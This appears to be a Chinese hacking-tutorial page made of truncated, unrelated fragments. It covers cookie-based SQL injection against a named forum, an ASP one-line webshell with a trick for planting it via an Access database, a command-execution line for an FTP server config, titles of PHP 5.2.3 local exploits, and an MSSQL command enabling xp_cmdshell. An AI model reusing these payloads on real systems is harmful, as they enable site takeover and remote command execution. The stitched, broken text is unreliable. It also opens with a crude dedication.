Author:Tr4c3[at]126[dot]CoM
http://www.nspcn.org
http://www.tr4c3.com
谨以此文献给在我老婆不在身边的时候陪我YY,看AV的n37p47ch,King,慕容大雨和BK瞬间群的所有淫棍。

大家好,我是初学者,在上一讲中,我们学习了"搜索型注入"的有关知识,今天我们再来学学另一种不常见的注入方法"cookie注入"在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面几讲中都提到Request对象获取客户端提交数据常用的是GET和POST二种方式,同时request对象可以不通过集合来获得数据,即直接使用"request("name")"但它的效率低下,容易出错,当我们省略具体的集合名称时,ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.

  我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5.0 "官方下载地址"http://www.cnetking.com/websys2.asp?id=26"发布时间是2007-06-06,打开系统的源代码后,在"user_RxMsg_detail.asp"文件中,有如下代码:

<!--#include file="opendb.asp" -->  (调用opendb.asp文件)

突破 ASP数据库 不能插马

<%execute request("value")%><%''<% loop <%:%>
是这样的顺序才行，也可以是以下顺序
<%''<% loop <%:%><%execute request("value")%>

By:lake2

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了，也只是听说而已，具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全，然后灵光一闪，呵呵，发现了一种可以利用access导出asp的方法，分享之。

精企业网站管理系统Sql注入漏洞
Author:Tr4c3[at]126[dot]com
http://www.nspcn.org
http://www.tr4c3.com
涉及版本：良精企业网站管理系统(2007-V09)官方正式商业版

// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists(''ini_get'')) ? ini_get(''register_globals'') : get_cfg_var(''register_globals'');

if ($onoff != 1) {
 @extract($_POST, EXTR_SKIP);

在任意帐户配置文件中添加SiteCommandList0=-1,TQ1,c:\a.bat,0,60,0,0,jid

TQ1=命令名

c:\a.bat=实际路径

乔客(joekoe) CMS 4.0 的2个高危漏洞

 
转载请保留版权标记,谢谢
-------------------------------by 大蝉@http://blog.gsnsg.com/weblog/usual/ QQ:271607603------------------------------------------

PHP 5.2.3的两个local exploit

1。PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
2。PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit

用下面一句话就可以了解决了。

EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure ''xp_cmdshell'', 1;RECONFIGURE;

关闭一样.只是将上面的后面的那个"1"改成"0"就可以了.